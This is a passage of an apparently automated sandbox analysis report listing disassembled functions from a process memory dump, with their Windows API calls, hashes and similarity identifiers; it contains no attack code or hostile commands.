                                    • Instruction ID: f37d632e44a7e370380b39cf19f060590834647b2277249efc6ea4713143e61b
                                    • Opcode Fuzzy Hash: 83904959c6b92378cdc39627f5e44b6eacf0c5795969984e008f468defc49b64
                                    • Instruction Fuzzy Hash: A5512A31A0821AABDF2C9FB99C987AE77A4EF55314F1500ADDE06D7244DF30CE818B95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE9A0, Relevance: 10.6, APIs: 7, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • wcschr.MSVCRT ref: 011DEB6D
                                    • iswspace.MSVCRT ref: 011DEC37
                                    • wcschr.MSVCRT ref: 011DEC4F
                                    • longjmp.MSVCRT(0120B8B8,00000001,?,00000000,?,011DED9F,?,00000000,?), ref: 011EC024
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC036
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,?), ref: 011EC049
                                    • longjmp.MSVCRT(0120B8B8,00000001), ref: 011EC05B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: longjmp$Heapwcschr$AllocProcessiswspace
                                    • String ID:
                                    • API String ID: 2511250921-0
                                    • Opcode ID: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                    • Instruction ID: 855c1b3e7172a5eb656384bddc97ad64c30c504bc0c15a4a9b2322f28b364cc7
                                    • Opcode Fuzzy Hash: 3d4d02ac21de062d6b759fcc972b96764ad1eb02ee49e1031271a5df004417e0
                                    • Instruction Fuzzy Hash: 14412C31601212C7EF3C5F6CD8987B637A5EF90706F04056EE9469B185EF709884CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F93E2, Relevance: 10.6, APIs: 7, Instructions: 131COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011F9427
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F954E
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 011F9480
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 011F9490
                                    • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 011F950B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9516
                                    • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 011F9529
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
                                    • String ID:
                                    • API String ID: 920682188-0
                                    • Opcode ID: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                    • Instruction ID: 3cf2fd26c6c5f8520a21dc510bc602aab42f822614b94fcb95667366dc233f2d
                                    • Opcode Fuzzy Hash: 13197c93769cc4e4ef6a66a30d89e5e3d5133ef86d3c73026ccc0e0c9dd6cc39
                                    • Instruction Fuzzy Hash: 7D41B431A00219ABDF29DFA5E858BEEB7B4FF58718F00419DE905E7250EB34DA84CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F17B6, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000040), ref: 011F17D7
                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,?,00000000,001F0001), ref: 011F1805
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,wil,00000000,?,?,?,?), ref: 011F189F
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?), ref: 011F18EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Mutex$CloseCreateCurrentHandleProcessRelease
                                    • String ID: Local\SM0:%d:%d:%hs$wil
                                    • API String ID: 3048291649-2303653343
                                    • Opcode ID: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                    • Instruction ID: 20532989193382df4dd7e8a453e33cca442cd0ce9d3e926a420876a1f1f93007
                                    • Opcode Fuzzy Hash: daee96c80e1cb2038758ccfa4614338558d4de4a6adec5af45a85da5fe24b2b5
                                    • Instruction Fuzzy Hash: 0B312871E40129EBCB2DDB54DD88FEA7775ABA0704F0141ADEA09A7244DB709D41CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6E03, Relevance: 10.6, APIs: 7, Instructions: 99sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,011FBE78,00000010), ref: 011E6E40
                                    • _amsg_exit.MSVCRT ref: 011E6E55
                                    • _initterm.MSVCRT ref: 011E6EA9
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 011E6ED5
                                    • exit.MSVCRT ref: 011E6F1C
                                    • _XcptFilter.MSVCRT ref: 011E6F2E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                    • String ID:
                                    • API String ID: 796493780-0
                                    • Opcode ID: 3b8df59d4ec9e09d288daf9dac45f59f3ad82cf03867811a1496ea1f1df5acd2
                                    • Instruction ID: c01f00fc130d3599109980b28f18ab596af904923a45020686dd5d407ba42614
                                    • Opcode Fuzzy Hash: 3b8df59d4ec9e09d288daf9dac45f59f3ad82cf03867811a1496ea1f1df5acd2
                                    • Instruction Fuzzy Hash: 85319071544A229FEF3EDBE8F80D7293BF0AB24729F50002DE512972D4DB305980CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4C3E, Relevance: 10.5, APIs: 7, Instructions: 42synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C55
                                    • GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C60
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011E4C7B
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE57
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011F7929,00000000,011F9313,00000000,00000000,?,011E9814,00000000), ref: 011EEE6D
                                    • fprintf.MSVCRT ref: 011EEE81
                                    • fflush.MSVCRT ref: 011EEE8F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                    • String ID:
                                    • API String ID: 4271573189-0
                                    • Opcode ID: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                    • Instruction ID: 1e3d46453040eada4163dbbde99bddb775cd771af8901d3305254d412792885d
                                    • Opcode Fuzzy Hash: 82e9cf2b012165ab400f70d2473881d8b653da03450d0145a8cbae9fdc55543a
                                    • Instruction Fuzzy Hash: A401D431801654FFDF24EBE8B80CA993BADEB15319F100249F024921D9CFB006808B62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E07C0, Relevance: 9.4, APIs: 6, Instructions: 361COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,8C8BFE4F,00000001,?), ref: 011E0816
                                      • Part of subcall function 011E0D51: memset.MSVCRT ref: 011E0D7D
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • towupper.MSVCRT ref: 011E0B44
                                      • Part of subcall function 011DE040: memset.MSVCRT ref: 011DE090
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE0F3
                                      • Part of subcall function 011DE040: wcschr.MSVCRT ref: 011DE10B
                                      • Part of subcall function 011DE040: _wcsicmp.MSVCRT ref: 011DE179
                                    • wcschr.MSVCRT ref: 011E0932
                                    • wcsncmp.MSVCRT(00000000,011D218C,00000004,00000002,00007FE7), ref: 011E0A76
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A06
                                      • Part of subcall function 011D6980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A10
                                      • Part of subcall function 011D6980: _wcsnicmp.MSVCRT ref: 011D6A3D
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A64
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6A6E
                                      • Part of subcall function 011D6980: _get_osfhandle.MSVCRT ref: 011D6A8E
                                      • Part of subcall function 011D6980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011D6AA0
                                      • Part of subcall function 011D6980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 011D6AC0
                                      • Part of subcall function 011D6980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AD1
                                      • Part of subcall function 011D6980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,00000200,00000000,00000000), ref: 011D6AE7
                                      • Part of subcall function 011D6980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011D6AF4
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 011ECCDE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
                                    • String ID:
                                    • API String ID: 1803274588-0
                                    • Opcode ID: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                    • Instruction ID: 0c35c30fb05bcba58be69a9150dd9c28021f8f27148d60a098fc080ed59b1ad5
                                    • Opcode Fuzzy Hash: 7db3bd28b2230f4c5a600131cbcbd2cf5bc0921d30300c7f7cfc2dfbedf93e7f
                                    • Instruction Fuzzy Hash: 18C10831B00A1687DB3C9FECCC9C7BE77E5AF58714F054568E90A97280EBB09991C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E4800, Relevance: 9.3, APIs: 6, Instructions: 327COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E4861
                                    • memset.MSVCRT ref: 011E4881
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E4991
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E499E
                                    • longjmp.MSVCRT(0120B8B8,00000001,00007FE9,00007FE9,?,?,?,?,00000000,?), ref: 011EE94C
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$Heap$AllocProcesslongjmp
                                    • String ID:
                                    • API String ID: 2656838167-0
                                    • Opcode ID: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                    • Instruction ID: a60e01ff0d5a996e948a621ff15948cbf00e643bf52fd4290830f50435c43733
                                    • Opcode Fuzzy Hash: 5fb23863ef84f287cb4b93a009a850ece2e652e6b9bdc2f115d537b9a9d913b2
                                    • Instruction Fuzzy Hash: ACD10374900A158BDB3DCF98C8987A9FBF5AF84704F0840DDDA4AA7681EB706E81CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DB6CB, Relevance: 9.2, APIs: 6, Instructions: 155COMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E99E9
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E99F1
                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002,?,?,?,?,-00000001,-00000001,-00000001,-00000001), ref: 011E9A30
                                    • _get_osfhandle.MSVCRT ref: 011E9A49
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 011E9A51
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Console$Write_get_osfhandle$Mode
                                    • String ID:
                                    • API String ID: 1066134489-0
                                    • Opcode ID: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                    • Instruction ID: b2367d8543b8867467642ad135a330f00be212c9dff3c6b42c8ea4a752b78ace
                                    • Opcode Fuzzy Hash: 5ff039ec64d9216b4eed72b3b2587159a5a2640a6f7a0d46ecb795624129ba88
                                    • Instruction Fuzzy Hash: 4741C431B006199BDF2CDEB8D85DBAE77E9EF90308F05446AE906DB181EB74D940CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DE5A8, Relevance: 9.1, APIs: 6, Instructions: 115COMMON
                                    Download Yara Rule
                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID:
                                    • API String ID: 1380661413-0
                                    • Opcode ID: 7c9ce815e34ec76f5b68321474e989b27e75f4b7abf43dc1482f8475a50fef48
                                    • Instruction ID: 1e04259f300a00a2ba5e78bc717ddac8be1921d31cde062bcb5a87e7d41ca4f4
                                    • Opcode Fuzzy Hash: 7c9ce815e34ec76f5b68321474e989b27e75f4b7abf43dc1482f8475a50fef48
                                    • Instruction Fuzzy Hash: 02411A30A057018BDB3DDF9CE45C72ABBE2AF84319F14052CD9559B2E5DB709885CB47
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E2616, Relevance: 9.1, APIs: 6, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000000,?,?,0120B980,00000002,00000000,?,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E2667
                                    • _get_osfhandle.MSVCRT ref: 011E2677
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011E9CA6,%s %s ,?,00000000,00000000), ref: 011E267F
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011E2694
                                      • Part of subcall function 011E27C8: _get_osfhandle.MSVCRT ref: 011E27DB
                                      • Part of subcall function 011E27C8: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                      • Part of subcall function 011E27C8: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                    • String ID:
                                    • API String ID: 4057327938-0
                                    • Opcode ID: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                    • Instruction ID: 82dd1b16d21cdff306abb0ec4e33d0a93c885e6816a1dd55a0f07e385e648846
                                    • Opcode Fuzzy Hash: 748438cf8469d61f7657e911d6be472636f5ec2834d7814663d1cd859f12a45c
                                    • Instruction Fuzzy Hash: BF210B32740B066BEF2C66E97C6DB6A36DCDBA8659F11053DFA0AD6180DF70CC004A61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E27C8, Relevance: 9.1, APIs: 6, Instructions: 86fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E27DB
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,000000FF,011FD620,00002000,00000000,00000000), ref: 011E281C
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,-00000001,?,00000000), ref: 011E2831
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0120B980,?,?,00000000), ref: 011ED70D
                                    • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,0120B980,00001000,011FD620,00002000,00000000,00000000,00000000), ref: 011ED730
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD620,00000000,?,00000000), ref: 011ED74E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                    • String ID:
                                    • API String ID: 3249344982-0
                                    • Opcode ID: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                    • Instruction ID: 4936cec639dff8ee6a99c22ccfc33561d2be85aaf3cdb5d6b5a3f60f827fc540
                                    • Opcode Fuzzy Hash: 2b8ebd5a962cbe2294487688cc4a196402efabeff171a66c39aa2ed5b3fb2c56
                                    • Instruction Fuzzy Hash: 8421B331A84608BBEF358EA5AC0DF6A7BFDEB14751F204169FA04A7184D7B05D40DB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F265F, Relevance: 9.1, APIs: 6, Instructions: 82memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011F2D6D: WaitForSingleObjectEx.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,000000FF,00000000,00000000,00000000,?,011F1838,?), ref: 011F2D7C
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                      • Part of subcall function 011F2DB4: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,?,011F26A5,?), ref: 011F2DBD
                                      • Part of subcall function 011F2DB4: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00000000,?,011F26A5,?), ref: 011F2DC6
                                      • Part of subcall function 011F2DB4: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,011F26A5,?), ref: 011F2DDF
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseHandle$ErrorHeapLast$FreeMutexObjectProcessReleaseSingleWait
                                    • String ID:
                                    • API String ID: 2383944720-0
                                    • Opcode ID: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                    • Instruction ID: 80a31ae270d6647d85b80ab13ddfc60267b43e5048c5ec5cad5e65a9cb50fdb9
                                    • Opcode Fuzzy Hash: 66541a32a584ae4daf0899b296677aaddbc20246ae0d8ccd2d74f64a32118042
                                    • Instruction Fuzzy Hash: 7D21A130601516ABDF2DEF6AE86896EBB69FF60714714822DEB0583544DF30D891CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6E90, Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 80COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEAB7
                                      • Part of subcall function 011DEA40: iswspace.MSVCRT ref: 011DEB2D
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB49
                                      • Part of subcall function 011DEA40: wcschr.MSVCRT ref: 011DEB6D
                                    • _wcsicmp.MSVCRT ref: 011F6EFC
                                    • _wcsicmp.MSVCRT ref: 011F6F1B
                                    • _wcsicmp.MSVCRT ref: 011F6F41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmpwcschr$iswspace
                                    • String ID: KEYS$LIST$OFF
                                    • API String ID: 3924973218-4129271751
                                    • Opcode ID: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                    • Instruction ID: 1e7c37c61c9c63b0c04d1cd5086850bc3b94e1d06a47020f7c0a798409792fff
                                    • Opcode Fuzzy Hash: 9b0b64ebf699e7cecb5abf8562cd04f01e497797f6b747f59ee6c090cb856c46
                                    • Instruction Fuzzy Hash: 33118C32708712EAA31DEB2EFC698237798FBE4624391801EE703861C6DF215C41C763
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6CE1, Relevance: 9.1, APIs: 6, Instructions: 79memorysynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?), ref: 011F26CD
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26ED
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 011F26FD
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?), ref: 011F2709
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F2710
                                    • ReleaseMutex.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?), ref: 011F2720
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseHandle$Heap$FreeMutexProcessRelease
                                    • String ID:
                                    • API String ID: 1689195821-0
                                    • Opcode ID: 43aff9ed9de6e9e2c5b8d704d9dc066bda54670e15678b7029d74873cc551807
                                    • Instruction ID: 2ffab06c7dab5df2767991c90d1485b4fbf639a71313ecd42036d1c362f98804
                                    • Opcode Fuzzy Hash: 43aff9ed9de6e9e2c5b8d704d9dc066bda54670e15678b7029d74873cc551807
